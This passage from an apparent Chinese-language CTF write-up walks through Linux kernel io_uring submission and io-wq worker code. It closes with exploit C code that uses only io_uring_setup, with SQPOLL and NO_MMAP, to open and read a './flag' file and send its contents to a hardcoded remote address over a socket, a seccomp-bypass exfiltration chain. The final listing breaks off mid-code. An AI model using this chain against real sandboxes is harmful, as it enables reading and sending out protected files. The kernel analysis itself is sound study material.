// 唤醒 sqo_sq 等待线程
if (creds)
revert_creds(creds);
}

return ret;
}

其中 io_sqring_entries 逻辑如下

所以内核在SQPOLL 模式下判断是否有任务需要执行,就是看 tail 是否更新

1
2
3
4
5
6
7
8
9
static inline unsigned int io_sqring_entries(struct io_ring_ctx *ctx)
{
struct io_rings *rings = ctx->rings;
unsigned int entries;

/* make sure SQ entry isn't read before tail */
entries = smp_load_acquire(&rings->sq.tail) - ctx->cached_sq_head;
return min(entries, ctx->sq_entries);
}

io_submit_sqes

最后是真正的提交请求函数

计算需要提交的sqes并跟踪状态

1
2
3
4
5
6
7
8
9
10
11
12
13
int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
__must_hold(&ctx->uring_lock)
{
unsigned int entries = io_sqring_entries(ctx);
unsigned int left;
int ret;

if (unlikely(!entries))
return 0;
/* make sure SQ entry isn't read before tail */
ret = left = min(nr, entries);
io_get_task_refs(left);
io_submit_state_start(&ctx->submit_state, left);

循环处理每个sqes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
do {
const struct io_uring_sqe *sqe;
struct io_kiocb *req;

if (unlikely(!io_alloc_req(ctx, &req)))
break;
if (unlikely(!io_get_sqe(ctx, &sqe))) {
io_req_add_to_cache(req, ctx);
break;
}
// 为每个SQE分配并初始化io_kiocb请求
if (unlikely(io_submit_sqe(ctx, req, sqe)) &&
// 真正的提交
!(ctx->flags & IORING_SETUP_SUBMIT_ALL)) {
left--;
break;
}
} while (--left);

io_submit_sqe

这个函数比较关键的是对于同步的处理, 我们知道, io_uring 是异步的, 任务处理的顺序不一定是按照提交的顺序, 但是, 如果 sqe 的 flag字段设置了 IOSQE_IO_LINK , 那么任务就会挂在一条链上, 直到一个任务没有此flag, 而链上的任务的执行是有先后顺序

同时, 要理解, ctx->sumit_state.link 是一个循环链表, 由 io_kiocb 组成, 每个 io_kiocb 的link成员指向下一个 io_kiocb 结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
static inline int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, const struct io_uring_sqe *sqe)
__must_hold(&ctx->uring_lock)
{
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe);
// 初始化并校验SQE请求req
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);
// 如果已有链头或者SQE标记了链接标志

trace_io_uring_submit_req(req);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (unlikely(link->head)) {
// 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志
ret = io_req_prep_async(req);
// 准备异步提交状态
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);

trace_io_uring_link(req, link->head);
link->last->link = req;
link->last = req;
// 将本项挂载到链表

if (req->flags & IO_REQ_LINK_FLAGS)
return 0;
// 如果此项没有 LINK 标志, 清空 链表
/* last request of the link, flush it */
req = link->head;
link->head = NULL;

if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL))
goto fallback;

} else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS |
REQ_F_FORCE_ASYNC | REQ_F_FAIL))) {
// 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头
if (req->flags & IO_REQ_LINK_FLAGS) {
link->head = req;
link->last = req;
} else {
fallback:
// 加入降级提交fallback队列
io_queue_sqe_fallback(req);
}
return 0;
}
// 加入普通提交队列
io_queue_sqe(req);
return 0;
}

io_queue_sqe | io_issue_sqe | 重要

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static inline void io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
int ret;

ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);

/*
* We async punt it if the file wasn't marked NOWAIT, or if the file
* doesn't support non-blocking read/write attempts
*/
if (likely(!ret))
io_arm_ltimeout(req);
else
io_queue_async(req, ret);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags)
{
const struct io_issue_def *def = &io_issue_defs[req->opcode];
// 根据op_code 查看请求def
const struct cred *creds = NULL;
int ret;

if (unlikely(!io_assign_file(req, def, issue_flags)))
return -EBADF;
// 为请求分配文件描述符
if (unlikely((req->flags & REQ_F_CREDS) && req->creds != current_cred()))
creds = override_creds(req->creds);
// 备份和恢复请求执行线程的安全凭证
if (!def->audit_skip)
audit_uring_entry(req->opcode);
// 调用audit跟踪提交事件

ret = def->issue(req, issue_flags);
// 调用def->issue执行请求

if (!def->audit_skip)
audit_uring_exit(!ret, ret);


if (creds)
revert_creds(creds);
// 恢复凭证
if (ret == IOU_OK) {
if (issue_flags & IO_URING_F_COMPLETE_DEFER)
// 如果成功并且标记了延迟完成,注册延迟完成回调
io_req_complete_defer(req);
else
io_req_complete_post(req, issue_flags);
// 否则直接提交完成
} else if (ret != IOU_ISSUE_SKIP_COMPLETE)
return ret;

/* If the op doesn't have a file, we're not polling for it */
if ((req->ctx->flags & IORING_SETUP_IOPOLL) && def->iopoll_queue)
io_iopoll_req_issued(req, issue_flags);

return 0;
}

io_get_sqe | 重要

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe)
{
unsigned mask = ctx->sq_entries - 1;
unsigned head = ctx->cached_sq_head++ & mask;

if (!(ctx->flags & IORING_SETUP_NO_SQARRAY)) {
head = READ_ONCE(ctx->sq_array[head]);
// 如果没有设置NOSQARRAY 直接从array读
if (unlikely(head >= ctx->sq_entries)) {
// 丢弃无效 entries
spin_lock(&ctx->completion_lock);
ctx->cq_extra--;
spin_unlock(&ctx->completion_lock);
WRITE_ONCE(ctx->rings->sq_dropped,
READ_ONCE(ctx->rings->sq_dropped) + 1);
return false;
}
}

if (ctx->flags & IORING_SETUP_SQE128)
head <<= 1;
*sqe = &ctx->sq_sqes[head];
// 从 sq_sqes 取一个sqe
return true;
}

io_submit_sqe | 同步与异步的请求执行

我们首先回到 io_submit_sqe

我们注意到, 如果存在 LINK 标记, 只是将这个req添加到链上, 而没有 io_queue_sqe.

如果前一个请求有 LINK 标记, 此时没有, 也只是将请求加入链中后, 清空 head. 此时调用的是 io_queue_sqe(NULL)

综上, 对于link, 并没有直接处理.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
	if (unlikely(link->head)) {
// 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志
ret = io_req_prep_async(req);
// 准备异步提交状态
if (unlikely(ret))
return io_submit_fail_init(sqe, req, ret);

trace_io_uring_link(req, link->head);
link->last->link = req;
link->last = req;
// 将本项挂载到链表

if (req->flags & IO_REQ_LINK_FLAGS)
return 0;
// 如果此项没有 LINK 标志, 清空 链表
/* last request of the link, flush it */
req = link->head;
link->head = NULL;

if (req->flags & (REQ_F_FORCE_ASYNC | REQ_F_FAIL))
goto fallback;

} else if (unlikely(req->flags & (IO_REQ_LINK_FLAGS |
REQ_F_FORCE_ASYNC | REQ_F_FAIL))) {
// 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头
if (req->flags & IO_REQ_LINK_FLAGS) {
link->head = req;
link->last = req;
} else {
fallback:
// 加入降级提交fallback队列
io_queue_sqe_fallback(req);
}
return 0;
}
// 加入普通提交队列
io_queue_sqe(req);

再次重回 io_queue_sqe 函数, 我们发现其在调用 io_issue_sqe 时设置了这样两个标志 IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER, 字面意义上理解, 就是非阻塞与延迟完成.

首先为什么要非阻塞呢?

让我们往前回想, 发现, 在 IOPOLL 模式下, io_uring_enter 也是调用了 io_submit_sqes , 最终也会调用到此函数, 所以如果这个函数阻塞了, IOPOLL模式下, 用户进程实际上也是阻塞的, 也就不符合异步的初衷了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static inline void io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
int ret;

ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);

/*
* We async punt it if the file wasn't marked NOWAIT, or if the file
* doesn't support non-blocking read/write attempts
*/
if (likely(!ret))
io_arm_ltimeout(req);
else
io_queue_async(req, ret);
}

接下来再进入 io_issue_sqe , 其中使用了一个虚表调用处理函数, 并且之前的flag也作为参数传入了.

而我们知道, 如read, write等很多操作, 都是阻塞的, 不能 NOBLOCK , 因此, 这个执行只是一个尝试执行, 实际上并没有真正完成请求

1
2
ret = def->issue(req, issue_flags);
// 调用def->issue执行请求

接下来我们注意到, 在 io_queue_sqe 调用此函数时, 设置了 IO_URING_F_COMPLETE_DEFER 标志

1
2
3
4
5
6
7
8
9
if (ret == IOU_OK) {
if (issue_flags & IO_URING_F_COMPLETE_DEFER)
// 如果成功并且标记了延迟完成,注册延迟完成回调
io_req_complete_defer(req);
else
io_req_complete_post(req, issue_flags);
// 否则直接提交完成
} else if (ret != IOU_ISSUE_SKIP_COMPLETE)
return ret;

继续进入 io_req_complete_defer 发现实际上就是将请求插入插入链表

1
2
3
4
5
6
7
8
9
static inline void io_req_complete_defer(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
struct io_submit_state *state = &req->ctx->submit_state;

lockdep_assert_held(&req->ctx->uring_lock);

wq_list_add_tail(&req->comp_list, &state->compl_reqs);
}

这也没有完成请求.

那么真正完成请求是在哪? 让我们继续分析

io_queue_async

io_issue_sqe 返回后, io_queue_sqe 继续调用了此函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
static void io_queue_async(struct io_kiocb *req, int ret)
__must_hold(&req->ctx->uring_lock)
{
struct io_kiocb *linked_timeout;

if (ret != -EAGAIN || (req->flags & REQ_F_NOWAIT)) {
io_req_defer_failed(req, ret);
return;
}// 如果请求是不可等待的必须立马完成的, 就不能推迟

linked_timeout = io_prep_linked_timeout(req);

switch (io_arm_poll_handler(req, 0)) {
// 这里调用了一个 论询问 handler, 确定 请求的类型
case IO_APOLL_READY:
// 如果已经可以完成了
io_kbuf_recycle(req, 0);
io_req_task_queue(req);
break;
case IO_APOLL_ABORTED:
// 如果终止了
io_kbuf_recycle(req, 0);
io_queue_iowq(req, NULL);
break;
case IO_APOLL_OK:
// 如果已经完成了
break;
}

if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
}

主要到, 当为 IO_APOLL_ABORTED 时, 调用了 io_queue_iowq

这里先介绍一下 kernel work queue 机制, workqueue 是一个内核线程池, 当有任务来时, 就从线程池中寻找一个线程运行, 这里就是将请求放入线程池的队列中

这里可能会有读者有疑问, 那线程池是什么时候创建的呢? 其实是在被笔者跳过的 ctx 的创建过程中// #TODO 由于过于繁杂, 笔者暂时没有分析

io_queue_iowq | 任务处理线程池

这一部分也比较重要, 首先是 io_prep_async_link(req) , 为在一条链上的请求创建 work 结构, 用来放入队列中, 并且 通过 io_wq_enqueue 将其加入线程池队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void io_queue_iowq(struct io_kiocb *req, struct io_tw_state *ts_dont_use)
{
struct io_kiocb *link = io_prep_linked_timeout(req);
struct io_uring_task *tctx = req->task->io_uring;

BUG_ON(!tctx);
BUG_ON(!tctx->io_wq);

/* init ->work of the whole link before punting */
io_prep_async_link(req);
// 为链少的每一个 req 准备work结构
/*
* Not expected to happen, but if we do have a bug where this _can_
* happen, catch it here and ensure the request is marked as
* canceled. That will make io-wq go through the usual work cancel
* procedure rather than attempt to run this request (or create a new
* worker for it).
*/
if (WARN_ON_ONCE(!same_thread_group(req->task, current)))
req->work.flags |= IO_WQ_WORK_CANCEL;

trace_io_uring_queue_async_work(req, io_wq_is_hashed(&req->work));
io_wq_enqueue(tctx->io_wq, &req->work);
if (link)
io_queue_linked_timeout(link);
}

为什么要用work结构而不是 io_kiocb 结构呢, work结构是 io_kiocb 的一个成员, 通过指针减去偏移就可以得到 io_kiocb 的指针, 与此通过, 由于work结构更小, 创建临时结构体时占用空间更小

io_wq_enqueue

io_wq_enqueue 是将任务加入 io_wq 线程池的任务队列中.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work)
{
struct io_wq_acct *acct = io_work_get_acct(wq, work);
struct io_cb_cancel_data match;
unsigned work_flags = work->flags;
bool do_create;

/*
* If io-wq is exiting for this task, or if the request has explicitly
* been marked as one that should not get executed, cancel it here.
*/
if (test_bit(IO_WQ_BIT_EXIT, &wq->state) ||
(work->flags & IO_WQ_WORK_CANCEL)) {
io_run_cancel(work, wq);
return;
}
// 如果需要取消 work
raw_spin_lock(&acct->lock);
io_wq_insert_work(wq, work);
clear_bit(IO_ACCT_STALLED_BIT, &acct->flags);
raw_spin_unlock(&acct->lock);

rcu_read_lock();
do_create = !io_wq_activate_free_worker(wq, acct);
rcu_read_unlock();
// 是否需要创建worker
if (do_create && ((work_flags & IO_WQ_WORK_CONCURRENT) ||
!atomic_read(&acct->nr_running))) {
bool did_create;

did_create = io_wq_create_worker(wq, acct);
// 创建worker
if (likely(did_create))
return;
// 如果已经创建了, 直接返回
raw_spin_lock(&wq->lock);
if (acct->nr_workers) {
raw_spin_unlock(&wq->lock);
return;
}
raw_spin_unlock(&wq->lock);

/* fatal condition, failed to create the first worker */
match.fn = io_wq_work_match_item,
match.data = work,
match.cancel_all = false,

io_acct_cancel_pending_work(wq, acct, &match);
}
}

实际上调用了 io_wq_create_worker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static bool io_wq_create_worker(struct io_wq *wq, struct io_wq_acct *acct)
{
if (unlikely(!acct->max_workers))
pr_warn_once("io-wq is not configured for unbound workers");

raw_spin_lock(&wq->lock);
if (acct->nr_workers >= acct->max_workers) {
raw_spin_unlock(&wq->lock);
return true;
}
// 如果已经有上限个 worker了
// 直接返回

acct->nr_workers++;
raw_spin_unlock(&wq->lock);
atomic_inc(&acct->nr_running);
atomic_inc(&wq->worker_refs);
return create_io_worker(wq, acct->index);
// 创建一个新worker
}

create_io_worker | worker处理线程的创建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static bool create_io_worker(struct io_wq *wq, int index)
{
struct io_wq_acct *acct = &wq->acct[index];
struct io_worker *worker;
struct task_struct *tsk;

__set_current_state(TASK_RUNNING);

worker = kzalloc(sizeof(*worker), GFP_KERNEL);
// 为work分配了空间
if (!worker) {
fail:
atomic_dec(&acct->nr_running);
raw_spin_lock(&wq->lock);
acct->nr_workers--;
raw_spin_unlock(&wq->lock);
io_worker_ref_put(wq);
return false;
}

refcount_set(&worker->ref, 1);
worker->wq = wq;
raw_spin_lock_init(&worker->lock);
init_completion(&worker->ref_done);

if (index == IO_WQ_ACCT_BOUND)
worker->flags |= IO_WORKER_F_BOUND;

tsk = create_io_thread(io_wq_worker, worker, NUMA_NO_NODE);
// 创建处理线程
if (!IS_ERR(tsk)) {
io_init_new_worker(wq, worker, tsk);
} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
kfree(worker);
goto fail;
} else {
INIT_WORK(&worker->work, io_workqueue_create);
schedule_work(&worker->work);
}

return true;
}

io_wq_worker | 内核任务线程

此线程就是线程池中worker的基本单元, 也是真正的异步io处理线程, 其通过自旋锁来阻塞进程, 直到有 work 需要完成.

中间一大段是和线程调度相关的代码, 包括设置信号处理之类的代码, 由于并不是当前分析的重点, 这里笔者就先跳过了.

最终, 是调用了 io_worker_handle_work 来处理任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
static int io_wq_worker(void *data)
{
struct io_worker *worker = data;
struct io_wq_acct *acct = io_wq_get_acct(worker);
struct io_wq *wq = worker->wq;
bool exit_mask = false, last_timeout = false;
char buf[TASK_COMM_LEN];

worker->flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING);

snprintf(buf, sizeof(buf), "iou-wrk-%d", wq->task->pid);
set_task_comm(current, buf);

while (!test_bit(IO_WQ_BIT_EXIT, &wq->state)) {
long ret;

set_current_state(TASK_INTERRUPTIBLE);

while (io_acct_run_queue(acct))
io_worker_handle_work(acct, worker);
// 轮询
// 如果存在需要完成的work
// io_acct_run_queue 就能持有 acct->lock 返回
raw_spin_lock(&wq->lock);
/*
* Last sleep timed out. Exit if we're not the last worker,
* or if someone modified our affinity.
*/
if (last_timeout && (exit_mask || acct->nr_workers > 1)) {
acct->nr_workers--;
raw_spin_unlock(&wq->lock);
__set_current_state(TASK_RUNNING);
break;
}
last_timeout = false;
__io_worker_idle(wq, worker);
//
raw_spin_unlock(&wq->lock);
if (io_run_task_work())
continue;
ret = schedule_timeout(WORKER_IDLE_TIMEOUT);
if (signal_pending(current)) {
struct ksignal ksig;

if (!get_signal(&ksig))
continue;
break;
}
if (!ret) {
last_timeout = true;
exit_mask = !cpumask_test_cpu(raw_smp_processor_id(),
wq->cpu_mask);
}
}

if (test_bit(IO_WQ_BIT_EXIT, &wq->state) && io_acct_run_queue(acct))
io_worker_handle_work(acct, worker);
// worker handle 必须持有 acct->lock

io_worker_exit(worker);
return 0;
}

io_worker_handle_work

这个函数必须持有 acct->lock 才能进入, 也是此函数真正开始处理任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
static void io_worker_handle_work(struct io_wq_acct *acct,
struct io_worker *worker)
__releases(&acct->lock)
{
struct io_wq *wq = worker->wq;
bool do_kill = test_bit(IO_WQ_BIT_EXIT, &wq->state);

do {
struct io_wq_work *work;

/*
* If we got some work, mark us as busy. If we didn't, but
* the list isn't empty, it means we stalled on hashed work.
* Mark us stalled so we don't keep looking for work when we
* can't make progress, any work completion or insertion will
* clear the stalled flag.
*/
work = io_get_next_work(acct, worker);
raw_spin_unlock(&acct->lock);
if (work) {
__io_worker_busy(wq, worker);

/*
* Make sure cancelation can find this, even before
* it becomes the active work. That avoids a window
* where the work has been removed from our general
* work list, but isn't yet discoverable as the
* current work item for this worker.
*/
raw_spin_lock(&worker->lock);
worker->next_work = work;
raw_spin_unlock(&worker->lock);
} else {
break;
}
io_assign_current_work(worker, work);
__set_current_state(TASK_RUNNING);

// 处理所有链起来的任务
do {
struct io_wq_work *next_hashed, *linked;
unsigned int hash = io_get_work_hash(work);

next_hashed = wq_next_work(work);
// 获取下一个任务

if (unlikely(do_kill) && (work->flags & IO_WQ_WORK_UNBOUND))
work->flags |= IO_WQ_WORK_CANCEL;
wq->do_work(work);
// do_work 来处理任务
io_assign_current_work(worker, NULL);

linked = wq->free_work(work);
// 断链
work = next_hashed;
// 将work改为下一个任务
if (!work && linked && !io_wq_is_hashed(linked)) {
work = linked;
linked = NULL;
}
io_assign_current_work(worker, work);
if (linked)
io_wq_enqueue(wq, linked);

if (hash != -1U && !next_hashed) {
/* serialize hash clear with wake_up() */
spin_lock_irq(&wq->hash->wait.lock);
clear_bit(hash, &wq->hash->map);
clear_bit(IO_ACCT_STALLED_BIT, &acct->flags);
spin_unlock_irq(&wq->hash->wait.lock);
if (wq_has_sleeper(&wq->hash->wait))
wake_up(&wq->hash->wait);
}
} while (work);
// 不断循环执行, 直到链上清空
if (!__io_acct_run_queue(acct))
break;
raw_spin_lock(&acct->lock);
} while (1);
}

注意到这里调用了 do_work 来处理任务, do_work 实际指向的是 io_wq_submit_work, 最终还是调用了 io_issue_queue 来处理任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
void io_wq_submit_work(struct io_wq_work *work)
{
struct io_kiocb *req = container_of(work, struct io_kiocb, work);
// 通过 work 结构体 直接根据偏移计算拿到 req 的指针
const struct io_issue_def *def = &io_issue_defs[req->opcode];
unsigned int issue_flags = IO_URING_F_UNLOCKED | IO_URING_F_IOWQ;
bool needs_poll = false;
int ret = 0, err = -ECANCELED;

/* one will be dropped by ->io_wq_free_work() after returning to io-wq */
if (!(req->flags & REQ_F_REFCOUNT))
__io_req_set_refcount(req, 2);
else
req_ref_get(req);

io_arm_ltimeout(req);

/* either cancelled or io-wq is dying, so don't touch tctx->iowq */
if (work->flags & IO_WQ_WORK_CANCEL) {
fail:
io_req_task_queue_fail(req, err);
return;
}
if (!io_assign_file(req, def, issue_flags)) {
err = -EBADF;
work->flags |= IO_WQ_WORK_CANCEL;
goto fail;
}

if (req->flags & REQ_F_FORCE_ASYNC) {
bool opcode_poll = def->pollin || def->pollout;

if (opcode_poll && file_can_poll(req->file)) {
needs_poll = true;
issue_flags |= IO_URING_F_NONBLOCK;
}
}

do {
ret = io_issue_sqe(req, issue_flags);
// 最终还是调用了 io_issue_sqe 来处理任务
if (ret != -EAGAIN)
break;

/*
* If REQ_F_NOWAIT is set, then don't wait or retry with
* poll. -EAGAIN is final for that case.
*/
if (req->flags & REQ_F_NOWAIT)
break;

/*
* We can get EAGAIN for iopolled IO even though we're
* forcing a sync submission from here, since we can't
* wait for request slots on the block side.
*/
if (!needs_poll) {
if (!(req->ctx->flags & IORING_SETUP_IOPOLL))
break;
if (io_wq_worker_stopped())
break;
cond_resched();
continue;
}

if (io_arm_poll_handler(req, issue_flags) == IO_APOLL_OK)
return;
/* aborted or ready, in either case retry blocking */
needs_poll = false;
issue_flags &= ~IO_URING_F_NONBLOCK;
} while (1);

/* avoid locking problems by failing it from a clean context */
if (ret < 0)
io_req_task_queue_fail(req, ret);
}

summary

笔者已经从上至下,透视了整个io_uring的实现//

当然,在这篇文章,笔者还留下了很多问题,比如linux kernel与同步和异步过程相关的实现, 由于笔者太菜了,对于kernel部分代码的分析也稍显吃力。

不过就这篇文章而言,在用户态io_uring的使用,笔者应该讲述得很清晰了。

最后,再让我们回到文章开始的问题:

如何只用一个 io_uring_setup 实现ORW?

在完全看完整篇文章后,大家应该也有答案了:

  • 设置 IORING_SETUP_SQPOLL 此时不再需要 io_uring_submite 提交
  • 设置 IORING_SETUP_NOMMAP 此时不再需要之后mmap ring和sqe

TODO

  • ctx 初始化分析
  • 线程调度分析
  • wq队列处理分析

exp

笔者在实际利用时发现, 在笔者的笔记本的qemu的环境里, 似乎是因为只有一个core, 如果控制权转移给了io_sq_thread 线程, 除非其主动转移控制权, 主进程基本会直接阻塞, 因此, open sq的处理实际要在 io_uring_setup 创建返回fd之前, 因此 flag文件的fd为3 才能稳定应用

通过Socket连接写回:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int main()
{
struct io_uring_params params = {0};
char flag[0x10] = "./flag\x00";
char buff[0x10] = "AAAAAAAA\n";
void *ring_ptr;
unsigned *ktail;
struct
{
__u64 a1;
__u64 a2;
} socket_add = //{0x0100007f5c110002, 0};
{0x017aa8c05c110002,0};
// mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL);
params.sq_off.user_addr = 0xC0D3000 + 0x1000;
ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000;
params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY;

params.sq_thread_idle = 0x2000000;

struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000);

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_LINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_READ;
sqe[1].flags = IOSQE_IO_LINK;
sqe[1].fd = 3;
sqe[1].addr = buff;
sqe[1].len = 0x100;

sqe[2].opcode = IORING_OP_SOCKET;
sqe[2].flags = IOSQE_IO_LINK;
sqe[2].fd = 2;
sqe[2].off = 1;

sqe[3].opcode = IORING_OP_CONNECT;
sqe[3].flags = IOSQE_IO_LINK;
sqe[3].fd = 5;
sqe[3].flags = 4;
sqe[3].addr = &socket_add;
sqe[3].off = 0x10;

sqe[4].opcode = IORING_OP_WRITE;
sqe[4].fd = 5;
sqe[4].addr = buff;
sqe[4].len = 0x100;
ktail = ring_ptr + 4;
io_uring_smp_store_release(ktail, 5);
__do_syscall2(425, 0x10, &params);

while (1) {};

return 0;
}

orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_HARDLINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_READ;
sqe[1].flags = IOSQE_IO_HARDLINK;
sqe[1].fd = 3;
sqe[1].addr = buff;
sqe[1].len = 0x10;

//sqe[4].flags = IOSQE_IO_HARDLINK;

sqe[2].opcode = IORING_OP_WRITE;
sqe[2].fd = 1;
sqe[2].addr = buff;
sqe[2].len = 0x10;

通过大量open避免 open的fd和 io_uring_setup 返回的fd竞争的问题
增强利用稳定性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_HARDLINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_OPENAT;
sqe[1].flags = IOSQE_IO_HARDLINK;
sqe[1].fd = -100;
sqe[1].addr = flag;

sqe[2].opcode = IORING_OP_OPENAT;
sqe[2].flags = IOSQE_IO_HARDLINK;
sqe[2].fd = -100;
sqe[2].addr = flag;

sqe[3].opcode = IORING_OP_OPENAT;
sqe[3].flags = IOSQE_IO_HARDLINK;
sqe[3].fd = -100;
sqe[3].addr = flag;

sqe[4].opcode = IORING_OP_OPENAT;
sqe[4].flags = IOSQE_IO_HARDLINK;
sqe[4].fd = -100;
sqe[4].addr = flag;

sqe[5].opcode = IORING_OP_READ;
sqe[5].flags = IOSQE_IO_HARDLINK;
sqe[5].fd = 6;
sqe[5].addr = buff;
sqe[5].len = 0x100;

sqe[6].opcode = IORING_OP_SOCKET;
sqe[6].flags = IOSQE_IO_HARDLINK;
sqe[6].fd = 2;
sqe[6].off = 1;

sqe[7].opcode = IORING_OP_CONNECT;
sqe[7].flags = IOSQE_IO_HARDLINK;
sqe[7].fd = 9;
sqe[7].flags = 4;
sqe[7].addr = &socket_add;
sqe[7].off = 0x10;

sqe[8].opcode = IORING_OP_WRITE;
sqe[8].fd = 9;
sqe[8].addr = buff;
sqe[8].len = 0x100;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int main()
{
struct io_uring_params params = {0};
char flag[0x10] = "./flag\x00";
char buff[0x10] = "AAAAAAAA\n";
void *ring_ptr;
unsigned *ktail;
struct
{
__u64 a1;
__u64 a2;
} socket_add = //{0x0100007f5c110002, 0};
{0x017aa8c05c110002,0};
//mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL);
params.sq_off.user_addr = 0xC0D3000 + 0x1000;
ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000;
params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY;

params.sq_thread_idle = 0x2000000;

struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000);

sqe[0].opcode = IORING_OP_OPENAT;
sqe[0].flags = IOSQE_IO_LINK;
sqe[0].fd = -100;
sqe[0].addr = flag;

sqe[1].opcode = IORING_OP_OPENAT;
sqe[1].flags = IOSQE_IO_LINK;
sqe[1].fd = -100;
sqe[1].addr = flag;

sqe[2].opcode = IORING_OP_OPENAT;
//sqe[2].flags = IOSQE_IO_LINK;
sqe[2].fd = -100;
sqe[2].addr = flag;


sqe[3].opcode = IORING_OP_READ;
//sqe[3].flags = IOSQE_IO_LINK;
sqe[3].fd = 4;
sqe[3].addr = buff;
sqe[3].len = 0x100;

sqe[4].opcode = IORING_OP_WRITE;
//sqe[4].flags = IOSQE_IO_LINK;
